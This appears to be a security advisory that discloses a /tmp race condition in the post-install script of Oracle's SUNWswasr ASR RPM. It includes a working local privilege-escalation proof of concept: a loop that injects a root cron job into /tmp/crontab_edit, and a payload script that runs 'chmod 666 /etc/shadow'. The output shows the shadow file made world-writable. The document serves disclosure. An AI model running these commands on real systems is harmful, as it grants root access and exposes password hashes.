########################################## [100%] [root@oracle-lnx-lab02 ~] crontab -l * * * * * /tmp/rootme 0,12,24,36,48 * * * * /opt/SUNWsasm/bin/sasm start-instance > /dev/null 2>&1 /tmp/rootme is: #!/bin/sh chmod 666 /etc/shadow after a minute: [root@oracle-lnx-lab02 ~] ls -l /etc/shadow -rw-rw-rw- 1 root root 744 Jan 30 21:02 /etc/shadow [root@oracle-lnx-lab02 ~] Faulty Code: 319 /usr/bin/crontab -l > /tmp/mytab.?? 320 if [ $(/bin/grep -c 'sasm' /tmp/mytab.??) -eq 0 ];then 321 echo "0,12,24,36,48 * * * * /opt/SUNWsasm/bin/sasm start-instance > /dev/null 2>&1" >> /tmp/mytab.?? 322 /usr/bin/crontab /tmp/mytab.?? 323 fi 324 325 rm /tmp/mytab.?? SUNWswasr RPM post install /tmp race condition From the documentation: "Auto Service Request (ASR) is a secure, scalable, customer-installable software feature of warranty and Oracle Support Services that provides auto-case generation when common hardware component faults occur. ASR is designed to enable faster problem resolution by eliminating the need to initiate contact with Oracle Support Services for common hardware component failures, reducing both the number of phone calls needed and overall phone time required. ASR also simplifies support operations by using electronic diagnostic data. Easily installed and deployed, ASR is completely controlled by you, the customer, to ensure security. ASR is applicable only for component faults. Not all component failures are covered, though the most common components (such as disk, fan, and power supplies) are covered." The post-install script for SUNWswasr RPM handles files in /tmp insecurely. I suspect a race condition exists where these two files can be used to either clobber root owned files or inject malicious cronjobs into roots cron: /tmp/tmpVariable /tmp/crontab_edit [root@oracle-lnx-lab02 ~]# rpm -Uvh SUNWswasr-4.3.1-20130117131218.rpm Preparing... ########################################### [100%] Copyright [2008,2012], Oracle and/or its affiliates. All rights reserved. License and Terms of Use for this software are described at https://support.oracle.com/ (see Legal Notices and Terms of Use). 1:SUNWswasr ########################################### [100%] Directory /var/opt/SUNWsasm/configuration/caseinfo created. Directory /var/opt/SUNWsasm/configuration/supportfile created. ASR Manager Auto Update functionality has been enabled by default. Please ensure that ASR manager is registered with ASR backend to get the software updates. Installation of SUNWswasr was successful. Lets fireup fsnoop[1] and take a look: [C] -rw-r--r-- 1 root root 0 Thu Jan 31 14:30:12 2013 /tmp/crontab_edit [U] -rw-r--r-- 1 root root 100 Thu Jan 31 14:30:12 2013 /tmp/crontab_edit [C] -rw-r--r-- 1 root root 0 Thu Jan 31 14:30:12 2013 /tmp/tmpVariable [U] -rw-r--r-- 1 root root 2 Thu Jan 31 14:30:12 2013 /tmp/tmpVariable [U] -rw-r--r-- 1 root root 101 Thu Jan 31 14:30:12 2013 /tmp/crontab_edit [U] -rw-r--r-- 1 root root 143 Thu Jan 31 14:30:12 2013 /tmp/crontab_edit [U] -rw-r--r-- 1 root root 188 Thu Jan 31 14:30:12 2013 /tmp/crontab_edit [D] F /tmp/tmpVariable [D] F /tmp/crontab_edit Those look exploitable lets pick one. I was able to inject my own cronjob in as root with the following simple PoC: $ while (true) ;do echo "* * * * * /tmp/rootme" >> /tmp/crontab_edit; done [root@oracle-lnx-lab02 ~]# crontab -l 0,12,24,36,48 * * * * /opt/SUNWsasm/bin/sasm start-instance > /dev/null 2>&1 * * * * * /tmp/rootme <--- prepended and contains our malicious shell/binary, see exploit above. ##Cronjob entry for ASR Auto Rules Update 7 3 * * * /opt/SUNWswasr/bin/update_rules.sh The uninstall script is just as sloppy: [C] F /tmp/asrtab.?? [U] F /tmp/asrtab.?? [C] F /tmp/asrtab.??? [U] F /tmp/asrtab.??? [C] F /tmp/asrtab.??? [U] F /tmp/asrtab.??? [D] F /tmp/asrtab.?? did they mean to use $$ for process Pid? References: [1] fsnoop - /tmp directory file watching utility by vl4dz. http://vladz.devzero.fr/fsnoop.php http://docs.oracle.com/cd/E18476_01/doc.220/e18478/asr.htm#BABHIHFF? http://vapid.dhs.org/advisories/Oracle_ASR_4.3.1-root-install.html Source: PacketStorm